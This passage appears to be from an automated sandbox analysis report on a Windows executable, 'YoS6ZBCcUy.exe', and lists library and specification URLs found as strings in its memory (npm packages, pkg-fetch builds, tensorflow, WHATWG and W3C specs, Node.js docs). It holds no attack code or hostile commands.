Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/normalize/mz
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/cli/blob/4c65cd952bc8627811735bea76b9b110cc4fc80e/lib/utils/ansi-trim.js
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-semver.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-tar/blob/51b6627a1f357d2eb433e7378e5f05e83b7aa6cd/lib/header.js#L349
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/patrickhulce/third-party-web
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild-install
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild-install.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/protocolbuffers/protobuf-javascript
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/protocolbuffers/protobuf/blob/master/java/lite.md
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/puppeteer/puppeteer/tree/main/packages/puppeteer-core
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/string_decoder
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/through2.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sass/node-sass/issues/1589#issuecomment-265292579
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/simplejson/simplejson
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sindresorhus/make-dir
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sindresorhus/os-homedir/blob/11e089f4754db38bb535e5a8416320c4446e8cfd/index.js
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sinonjs/fake-timers/blob/a4c757f80840829e45e0852ea1b17d87a998388e/src/fake-timers
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/broofa
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/ctavan
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/feross
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/ljharb
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/models
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/tensorflow
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/text.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/tflite-support
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/test262-utils/test262-harness-py
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/troygoode/node-require-directory/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/uuidjs/uuid#getrandomvalues-not-supported
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/uuidjs/uuid.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/v8/v8/blob/6.0.122/test/mjsunit/fast-prototype.js#L48-L63
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/2068735040
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/2068735307
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/2068735697
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/2068736093
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/2068736404
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/2638965835
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/2638965968
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/2638966056
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/2638966247
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/2638966552
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/752615021
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/752615173
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/752615423
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/752615557
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/752615807
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/888438143
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/888438190
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/888438236
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/918633749
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/releases/download/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4805
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4805Custom
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/gamepad/pull/120
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/gamepad/pull/120Access
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-features
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-featuresDeviceOri
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/wasdk/wasmparser
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1202
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1869.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1940.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/xiph/rnnoise
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/y18n
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs#supported-nodejs-versions
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs-parser#supported-nodejs-versions
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs-parser.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/zeux/volk
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/zorkow/speech-rule-engine
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.freedesktop.org/xorg/proto/xproto/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/LdLk22
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/LdLk22Media
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/LdLk22RemoveElementFromDocumentMapit
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gle/chrome-insecure-origins
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hackerone.com/reports/541502
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/mozilla-central/file/tip/netwerk/base/nsURLParsers.cpp
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/comms.html#the-websocket-interface
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/server-sent-events.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/server-sent-events.html#server-sent-events.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/web-messaging.html#broadcasting-to-other-browsing-contexts
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ltp.sourceforge.net/coverage/lcov/geninfo.1.php
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://medium.com/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://no-color.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodei.co/npm/require-directory.png?downloads=true&stars=true)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodei.co/npm/require-directory/)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/permissions.html#file-system-permissions
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://npmjs.org/package/require-directory))
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://opensource.apple.com/source/xnu/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://polymer-library.polymer-project.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/pyparsing
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/six/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.python.org/pypi/pyfakefs
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.python.org/pypi/webapp2
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://quiche.googlesource.com/quiche
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://secure.travis-ci.org/troygoode/node-require-directory.png)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://semver.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2086278028.0000000004753000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shorturl.at/drFY7)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/site/gaviotachessengine/Home/endgame-tablebases-1
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sizzlejs.com/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skia.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://source.corp.google.com/piper///depot/google3/third_party/tamachiyomi/README.md
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sourceforge.net/projects/wtl/files/WTL%2010/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/
